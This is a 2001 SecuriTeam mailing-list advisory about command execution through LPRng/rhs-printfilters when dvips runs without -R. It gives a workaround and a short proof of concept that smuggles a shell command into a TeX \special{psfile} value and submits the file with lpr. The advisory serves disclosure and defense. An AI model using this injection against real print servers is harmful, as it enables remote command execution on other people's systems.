[UNIX] LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands

From: support@securiteam.com
Date: 09/03/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands
Message-Id: <20010903192614.3C97E138C0@mail.der-keiler.de>
Date: Mon,  3 Sep 2001 21:26:14 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  LPRng/rhs-printfilters Vulnerability Leads to Remote Execution of Commands
------------------------------------------------------------------------

SUMMARY

If the lpd is listening on 0.0.0.0 and no access controls are in place, it
is possible to execute commands as the lp user, assuming tetex-dvips is
installed.

DETAILS

Unless the -R option is passed, the example file will execute the command
when converted to a .dvi file (tex spool.tex).

Workaround:
Modify /usr/lib/rhs/rhs-printfilters/dvi-to-ps.fpi
..
dvips -f $DVIPS_OPTIONS < $TMP_FILE
..

To:
..
dvips -R -f $DVIPS_OPTIONS < $TMP_FILE
..

Making it safer.

Proof of concept:
Use this to test your machine:
cat >proof-of-concept.tex <<EOF
\special{psfile="`touch /tmp/lpowned"}
\end
EOF
tex proof-of-concept
lpr proof-of-concept.dvi

ADDITIONAL INFORMATION

The information has been provided by <mailto:zen-parse@gmx.net>
zen-parse.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [UNIX] Vulnerabilities Found in Scponly
    ... SSHd environment files. ... the user can upload a file with a custom ... This provides the user with a means of running arbitrary commands ... the user could execute arbitrary commands by uploading ...
    (Securiteam)
  • Re: [Full-disclosure] FWD Cisco IOS Remote Command Execution Vulnerability
    ... > Vulnerability Alert Cisco IOS Remote Command Execution ... > 9.4 Last Change Cisco has responded to this issue; ... > prone to an issue that may permit gay people to execute arbitrary ... > commands from a password prompt. ...
    (Full-Disclosure)
  • Dont mind if I grouse on some basic topics?? (very long)
    ... I know as experienced programmers you really don't want to hear people gripe ... and moan about basic, indeed critical topics, but I just have to vent on ... commands within a set sequence. ... doesn't appear to uniformly execute them. ...
    (comp.windows.x)
  • Re: HELP !!! No more task-bare and menu bare
    ... He should though be able to start a new terminal login from his root session and there login as himself and execute the commands to get the bars back. ... So I delete ALL my directories .xxx and ALL my files .xxx from my /home/dir then login on my Ubuntu account and it's the same!!!! ... Initializing nautilus-share extension ...
    (Ubuntu)
  • Re: Redirection issue
    ... 1- execute input commands from standard input, ... the phrase "it does not work anymore" carries very little meaning. ... after compilation and execution of the shell with a simple command like ...
    (comp.lang.c)